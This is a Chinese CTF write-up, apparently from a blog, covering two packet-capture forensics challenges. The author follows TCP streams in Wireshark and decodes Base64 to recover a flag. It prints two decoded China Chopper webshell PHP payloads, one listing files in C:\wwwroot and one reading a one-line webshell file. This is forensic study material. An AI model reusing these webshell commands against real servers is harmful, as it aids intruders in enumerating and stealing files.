本文通过分析数据包,逐步揭示了一次网络攻防演练中的Flag获取过程。从数据包中发现POST请求,追踪TCP流,解码Base64,直至找到隐藏的Flag,同时解析了涉及的木马代码和文件读取操作。
flag被盗
打开题目,发现文件是一个数据包,下载数据包
将下载下来的数据包用wareshark打开,往下滑,发现有一个post请求
直接在这条数据包上右键追踪TCP流
发现flag
中国菜刀
下载压缩包,解压
打开数据包,发现第五条数据包有个post请求,在上面追踪TCP流,发现一船base64编码
复制,用在线编码解码,得到一段代码如下,它的作用是读取c:/wwwroot目录下所有文件、目录的名字、大小、权限、以及最后一次的修改时间
@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<'5.3.0'){
@set_magic_quotes_runtime(0);};
echo("X@Y");
$D='C:\\wwwroot\\';
$F=@opendir($D);
if($F==NULL){
echo("ERROR:// Path Not Found Or No Permission!"); }
else{
$M=NULL;
$L=NULL;
while($N=@readdir($F)){
$P=$D.'/'.$N;
$T=@date("Y-m-d H:i:s",@filemtime($P));
@$E=substr(base_convert(@fileperms($P),10,8),-4);
$R="\t".$T."\t".@filesize($P)."\t".$E."\n";
if(@is_dir($P))$M.=$N."/".$R;
else $L.=$N.$R; }
echo $M.$L;
@closedir($F); };
echo("X@Y");
die();
继续向下分析,在下一个数据包里面发现了一个flag.tar.gz文件
继续向下分析,又发现一个post请求,追踪TCP流,将其中的base64解码一下,代码如下,可以看到,它是用来读取3.php的内容的
@ini_set("display_errors","0");
@set_time_limit(0);
if(PHP_VERSION<'5.3.0'){
@set_magic_quotes_runtime(0);};
echo("X@Y");
$F='C:\\wwwroot\\3.php';
$P=@fopen($F,'r');
echo(@fread($P,filesize($F)));
@fclose($P);;
echo("X@Y");
die();
在下个数据包中看到3.php是一句话木马,
继续分析将下一个数据包中的base64解码,发现是读取flag.tar,gz文件内容的
,那么下一个数据包可能就能得到flag了
由于flag.tar,gz是个压缩包,所以我们需要将字节流用压缩包格式查看,找到下一个数据包,在最下方右键显示分组字节流
将其解码为压缩包,由于要使X@Y不可见,所以设置开始为3,解码后即出现flag
扫一扫
2344
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
